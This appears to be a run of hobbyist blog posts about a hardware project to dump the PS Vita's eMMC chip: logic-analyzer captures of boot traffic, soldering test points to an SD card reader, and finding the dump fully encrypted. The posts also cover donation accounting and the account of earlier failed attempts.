My first hypothesis on why it is not working is that there’s some special initialization command that the eMMC requires. For example, CMD42 of the MMC protocol allows password protection on the chip. Another possibility was that the chip resets into boot mode, which the SD card reader doesn’t understand. To clear any doubts, I connected CLK, CMD, and DAT0 to my Saleae Logic clone I got from eBay.

Vita eMMC points connected to logic analyzer.

Vita eMMC points connected to logic analyzer.

As you can see from the setup, I had the right controller board attached so I can get a power indicator light (not required, but useful). I also took the power button out of the case and attached it directly. The battery must be attached for the Vita to turn on. Everything is Scotch-taped to the table so it won’t move around. Once all that is done, I captured the Vita’s eMMC traffic on startup.

First command sent to eMMC on startup

First command sent to eMMC on startup

After reading the 200 paged specifications on eMMC, I understood the protocol and knew what I was looking at. The very first command sent to the Vita is CMD0 with argument 0x00000000 (GO_IDLE_STATE). This is significant for two reasons. First, we know that the Vita does NOT use the eMMC’s boot features. The Vita does not have its first stage bootloader on the eMMC, and boots either from (most likely) an on-chip ROM or (much less likely) some other chip (that mystery chip on the other side maybe?). Second, it means that there’s no trickery; the eMMC is placed directly into Idle mode, which is what SD cards go into when they are inserted into a computer. This also means that the first data read from the eMMC is in the user partition (not boot partition), so the second or third stage loader must be in the user partition of the eMMC. For the unfamiliar, the user partition is the “normal” data that you can see at any point while the boot partition is a special partition only exposed in boot mode (and AFAIK, not supported by any USB SD card reader). Because I don’t see the boot partition used, I never bothered to try to dump it.

Dumping

I tried a dozen times last week on two separate Vita logic boards trying to dump the NAND with no luck. Now that I’m on my third (and final) Vita, I decided to try something different. First, I did not remove the resistors sitting between the SoC and eMMC this time. This is because I wanted to capture the traffic (see above) and also because I am much better at soldering now and the tiny points doesn’t scare me anymore. Second, because of my better understanding of the MMC protocol (from the 200 page manual I read), I no longer attempted to solder DAT1-DAT3 because that takes more time and gives more chance of error due to bad connections. I only connected CLK, CMD, and DAT0. I know that on startup, the eMMC is placed automatically into 1-bit read mode and must be switched to 4-bit (DAT0-DAT3) or 8-bit (DAT0-DAT7) read mode after initialization. My hypothesis is that there must be an SD card reader that followed the specification’s recommendation and dynamically choose the bus width based on how many wires can be read correctly (I also guessed that most readers don’t do this because SD cards always have four data pins). To test this, I took a working SD card, and insulated the pins for DAT1-DAT3 with tape. I had three SD card readers and the third one worked! I know that that reader can operate in 1-bit mode, so I took it apart and connected it to the Vita (CLK, CMD, DAT0, and ground).

As you can see, more tape was used to secure the reader.

As you can see, more tape was used to secure the reader.

I plugged it into the computer and… nothing. I also see that the LED read indicator on the reader was not on and a multimeter shows that the reader was not outputting any power either. That’s weird. I then put a working SD card in and the LED light turned on. I had an idea. I took the SD card and insulated every pin except Vdd and Vss/GND (taped over every pin) and inserted the SD card into the reader. The LED light came on. I guess there’s an internal switch that gets turned on when it detects a card is inserted because it tries to draw power (I’m not hooking up Vdd/Vss to the Vita because that’s more wires and I needed a 1.8V source for the controller and it’s just a lot of mess; I’m using the Vita’s own voltage source to power the eMMC). I then turned on the Vita, and from the flashing LED read light, I knew it was successful.

LED is on and eMMC is being read

LED is on and eMMC is being read

Analyzing the NAND

Here’s what OSX has to say about the eMMC:

Product ID: 0x4082
Vendor ID: 0x1e3d (Chipsbrand Technologies (HK) Co., Limited)
Version: 1.00
Serial Number: 013244704081
Speed: Up to 480 Mb/sec
Manufacturer: ChipsBnk
Location ID: 0x1d110000 / 6
Current Available (mA): 500
Current Required (mA): 100
Capacity: 3.78 GB (3,779,067,904 bytes)
Removable Media: Yes
Detachable Drive: Yes
BSD Name: disk2
Partition Map Type: Unknown
S.M.A.R.T. status: Not Supported

I used good-old “dd” to copy the entire /dev/rdisk2 to a file. It took around one and a half hours to read (1-bit mode is very slow) the entire eMMC. I opened it up in a hex editor and as expected the NAND is completely encrypted. To verify, I ran a histogram on the dump and got the following result: 78.683% byte 0xFF and almost exactly 00.084% for every other byte. 0xFF blocks indicate free space and such an even distribution of all the other bytes means that the file system is completely encrypted. For good measure, I also ran “strings” on it and could not find any readable text. If we assume that there’s a 78.600% free space on the NAND (given 0xFF indicates free space and we have an even distribution of encrypted bytes in non-free space), that means that 808.70MB of the NAND is used. That’s a pretty hefty operating system in comparison to PSP’s 21MB flash0.

What’s Next

It wasn’t a surprise that the eMMC is completely encrypted. That’s what everyone suspected for a while. What would have been surprising is if it WASN’T encrypted, and that tiny hope was what fueled this project. We now know for a fact that modifying the NAND is not a viable way to hack the device, and it’s always good to know something for sure. For me, I learned a great deal about hardware and soldering and interfaces, so on my free time, I’ll be looking into other things like the video output, the mystery connector, the memory card, and the game cards. I’ve also sent the SoC and the two eMMC chips I removed to someone for decapping, so we’ll see how that goes once the process is done. Meanwhile, I’ll also work more with software and try some ideas I picked up from the WiiU 30C3 talk. Thanks again to everyone who contributed and helped fund this project!

Accounting

In the sprit of openness, here’s all the money I’ve received and spent in the duration of this hardware hacking project:

Collected: $110 WePay, $327.87 PayPal, and 0.1BTC

Assets

Logic Analyzer: $7.85
Broken Vita logic board: $15.95
VitaTV x 2 (another for a respected hacker): $211.82
Rework station: $80
Broken 3G Vita: $31
Shipping for Chips to be decapped: $1.86

Total: $348.48 (I estimated/asked for $380)

I said I will donate the remaining money to EFF. I exchanged the 0.1BTC to USD and am waiting for mtgox to verify my account so I can withdraw it. $70 of donations will not be given to the EFF by the request of the donor(s). I donated $25 to the EFF on January 10, 2014, 9:52 pm and will donate the 0.1BTC when mtgox verifies my account (this was before I knew that EFF takes BTC directly).

PS Vita NAND Pinout (Updated)

Since the last post on the eMMC pinout, I found the other two important test points. First is VCCQ, which is the power to the eMMC controller. It needs to be pulled at 1.8V. The other point is VCC, which is the power to the actual NAND flash. It needs to be pulled at 3.3V.

Found on the bottom of the board, above the SoC

Found on the bottom of the board, above the SoC

Found on the bottom of the board, near the multi-connector

Found on the bottom of the board, near the multi-connector

For reference, the pad of the removed eMMC on the second Vita

For reference, the pad of the removed eMMC on the second Vita

 

 

Updates on the Vita Hardware Hacking project

After a week of trying to dump the eMMC (spoilers: didn’t happen yet), I’ve decided to post this update about things I’ve tried to do (and how I tried to do it) and where the money is going to.

Supplies

I had two Vita logic boards. The first one, which I removed the SoC and eMMC to find the trace points (shown previously), came from eBay. The second board came from a Vita with a broken screen generously donated by @Amxomi. I also bought a professional rework station, the X-Tronic 4040 which was paid partially by your donations (I returned the heat gun) and partially thanks to wololo. For wiring, the thinnest wire I could find is enamel-coated magnet wire. For soldering the wires, I got 60/40 Rosin solder and a Rosin flux pen.

Attempt One

The first thing I did was remove the EMI shield base blocking the test point resistors. With the reflow station’s hot air gun, it was much easier than the heat gun I used last time. Next I warmed up my soldering skills by hooking wires up to a microSD to SD card adapter. My plan was to attach the wires to the test point and plug the SD card into a SD card reader. To expose the copper in the enamel-coated wire, I melted a blob of solder and kept it on the tip of the iron at 400C. Then I dipped the tip of the wire into the liquid solder, which both coats the tip of the wire with solder and also removes the coating. It’s a neat trick that I used all the time throughout the rest of the ordeal.

Then I brushed the pins of the microSD adapter with flux and quickly melted a small blob of solder on each pin. Then with a pair of tweezers, I held each wire next to the pin, and as soon as it is heated, the small bit of solder on the wire joins with the blob on the pin and they connect.

It gets much harder connecting the other end. There is very little exposed solder on the tiny resistors, and it is very hard to add more because you might accidentally short circuit two adjacent pads. I made sure there is a bit of solder on the end of the wire using the trick. Then I held the end of the wire steady with the tweezer while tapping it with the iron. It takes many tries for it to stick on, and many times when trying to attach the neighboring pads, the heat from the iron loosens the other wires. In addition, accidentally bumping into the wire causes enough stress to rip the solder off the resistor (because there is so little solder), so I just taped everything to a piece of cardboard. I also can’t test if my joints are correct and not shorted with any other joints because of how small and close everything is.

After a couple of hours, the wires are soldered to the points but there are a couple of problems. First, as mentioned, I couldn’t test the correctness of my connections. Second, I don’t know if in the process of soldering to the tiny resistors, I damaged any resistors and if so, would it still work. Third, I never found a test point for Vdd because for some reason, Vdd shorts to Vss/Ground on my first board. As expected, after plugging the microSD adapter into a reader into the computer, nothing shows up. Because there could be so many problems, I removed all the wires and started over.

Attempt Two

First, I located a test point for Vddf (Vdd is power to the eMMC controller while Vddf is power to the actual NAND chip). My hypothesis is that the same power source that powers Vddf also powers Vdd (although the Samsung documents recommends against this). This point is on top of the tiny resistor to the left of the audio jack.

Next, I decided to remove all of the 150ohm resistors on the test points in order to get more solder surface area. Looking at the eMMC testpoints picture from last time, it’s important to note that the pad on the left of each resistor is the one coming from the eMMC while the pad on the right of each resistor is the one going to the SoC. The resistors themselves may be for current limiting or noise removal. Removing them is as simple as pointing at it with the hot air gun set to 380C for half a minute and then using tweezers to to remove them.

I also found it easier to solder wires directly to the SD card reader instead of to an microSD to SD card adapter. I first verified that the card reader still works and that my wires are not too long by soldering the other end of the wire directly to an old 128MB SD card. After verifying, I removed the wires from the SD card and attached them to the now exposed test points.

Unfortunately, it still didn’t work. The computer sees the SD card reader but believes no card is inserted. Again, there could be any number of problems including (still) bad soldering, Vdd not receiving power, or even read protection in the eMMC.

Attempt Three

Next I made another attempt to find Vdd. The problem is that my multimeter shows a short from Vdd to Vss. This means that Vdd is somehow shorted to ground either because I broke something with all the heat and bad soldering or because that is by design (which I don’t think is true because all documents I read say that you need to power Vdd for the eMMC controller to work). I thought maybe I can experiment by sending test voltages through various locations on the first logic board (the one with the chips removed) and see if I get a voltage drop in the Vdd pad. I used an old broken MP3 player as my voltage source (since it was just laying around and I didn’t want to buy a power supply, rip open any working cable/device, or solder to a battery). I attached the positive end to a pointed screwdriver and the negative end to the Vita’s ground. Then I attached one probe of my voltmeter to the same ground. Then with the screwdriver in one hand and the voltmeter probe in the other hand, I tried to send voltage through every location on the board. Unfortunately, the only response was sparks on capacitors here and there but no response in Vdd.

Back to the second Vita, I tried to attach the battery and charger and turned it on. At first, I got excited and saw a voltage drop on the eMMC’s decoupling capacitor (meaning there’s power going to the eMMC). However, after going back and reattaching the wires, I could no longer reproduce the result. In addition, the power light no longer responds to the power switch. I believe that I shorted something and the first time I powered it on, it destroyed some component; so the next time I attempted to power it on, it fails before even attempting to power the eMMC.

Regardless, I tried to reattach all the wires with better soldering on the assumption that my only problem is still the bad soldering (likely not true). Being the fourth or fifth time doing this, I am getting better at soldering these extremely tiny points. My trick was to first align the wire to the board and then using the tweezer, make a 90 degree bend on the end of the wire. This makes the end of the wire the same length as the original resistors. Then I quickly dip the end in solder, flux the board, and attach the wire to two pads instead of one. This makes a stronger connection. Even though I did a much better job and soldering the test points, I still could not get anything to show up on my computer.

Attempt Four

Now that I have experience in soldering tiny points, I made an attempt at soldering directly to the eMMC removed from the first Vita. However, after a quick test (nothing shows up on the computer), I didn’t look any farther because I believe that the eMMC must be part of a circuit of capacitors and resistors in order for it to work (and not break the chip). All documents I’ve read supports this.

I also made yet another attempt at resoldering to the board again and still no luck. At this point, I believe that either I still am not powering Vdd correctly, or I broke the eMMC at some point. I also suspect that perhaps my SD card reader does not support the Samsung eMMC or that it is not being initialized correctly.

What’s Next

I still haven’t given up. I will continue to try resoldering the points. I still want to find a way to surely power Vdd; I bought another Vita from eBay because I believe the second Vita is now broken. I also ordered a eMMC socket with the last of the usable donations, but it will take at least a month to arrive from China. There’s also the possibility that the eMMC does something unsupported by my SD card to USB adapter and I want to do some raw signal interaction with an Arduino. If you want live updates of progress as I’m working, join #vitadev on EFnet.

Page 1 of 712345...Last »